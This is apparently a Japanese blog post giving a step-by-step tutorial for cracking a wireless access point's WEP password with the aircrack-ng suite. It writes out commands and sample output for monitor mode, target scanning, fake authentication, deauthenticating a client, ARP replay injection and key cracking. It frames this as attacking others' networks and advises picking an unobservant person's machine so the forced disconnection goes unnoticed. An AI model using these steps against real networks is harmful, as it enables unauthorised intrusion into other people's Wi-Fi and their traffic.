aircrack-ngでAPをクラック

/ Linux/Unix / Comment[0]
なんとLOOX Uはaircrackに対応しています

クラックの手順
 1 ターゲットを探す/絞り込む
 2 ターゲットが流してるパケットをキャプチャ
 3 キャプチャしたパケットをもとにパスワードを解析

1 ターゲットを探索
ターゲットを探索するにはairodumpコマンドを使ってリストアップします。
airodumpを使うには、デバイスをモニターモードにしなければなりません。
↓のコマンドでデバイスをモニターモードにします。
 # airmon-ng start wlan0
モニターモードにするとmonというデバイスが仮想的に作成されます。

作成されたモニターモードのデバイスを指定してAPを探索開始
 # airodump-ng mon0
 CH 11 ][ BAT: 2 hours 50 mins ][ Elapsed: 9 mins ][ 2010-07-24 21:26          

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

AA:AA:AA:AA:AA:AA -61 4387 10384 6 11 54e WEP CCMP PSK XXXX

BSSID STATION PWR Rate Lost Packets Probes

AA:AA:AA:AA:AA:AA BB:BB:BB:BB:BB:BB 0 0 -36e 0 224 1X1X1X1X
AA:AA:AA:AA:AA:AA CC:CC:CC:CC:CC:CC -19 54e-54 0 491 test
AA:AA:AA:AA:AA:AA DD:DD:DD:DD:DD:DD -22 54 -54 0 10236
airodump-ngの見方
 BSSIDが探知されたAP
 STATIONがそのAPに接続しているクライアント

ターゲットはAA:AA:AA:AA:AA:AAにするとして

2 パケットキャプチャ
アクティブなクライアントが多ければ多いほど#Dataは溜まっていきますが、クライアントが通信していない場合はまったく溜まりません。
そんな時は、ARPリクエストを送りつけてパケットを無理やり返信させましょう。
でも、ただARPを送りつければ誰にでもパケットを返信するわけではありません。ARPリプレイには認証が必要です。
そこで、偽造認証攻撃で無理やり認証させます。

・オープンシステムの偽造認証
 # aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA mon0
 Association successful :-)と表示されたら認証完了

・共有鍵認証システムの偽造認証
クライアントを一時的に切断させると、そのクライアントには自動的に再接続の作業が発生します。
その時の、再認証パケットをキャプチャして、そのパケットで認証させるという仕組みです。
クライアントは一時的に切断されるので、人によっては不審に思うかもしれません。
もし、どのような人がどのマシンを使っているか把握しているのなら、鈍い人のマシンを狙うといいでしょう。

 切断させる→再接続が発生する→パケットをキャプチャ
 # aireplay-ng -0 1 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0

 再接続時のキャプチャデータを使用して認証させる
 # aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -y hoge-AA:AA:AA:AA:AA:AA.xor


どちらかの方法で認証ができたら、ARPリクエストを送信してパケット発生させる
 # aireplay-ng -3 -b AA:AA:AA:AA:AA:AA mon0

別ウインドウでそのパケットを拾う
 # airodump-ng --bssid AA:AA:AA:AA:AA:AA -w hogehoge mon0

3 解析
数万パケット溜まったら、もう一つ別ウインドウを開いて解析を開始する
 # aircrack-ng hogehoge.cap [-w wordlist]

あとはパスワードが表示されるまで待つだけです。

パスワードが短かったり、WEPだったり脆いセキュリティなら数分で破れることでしょう。
関連記事

コメント

:
:
:
:
:
管理人のみ表示を許可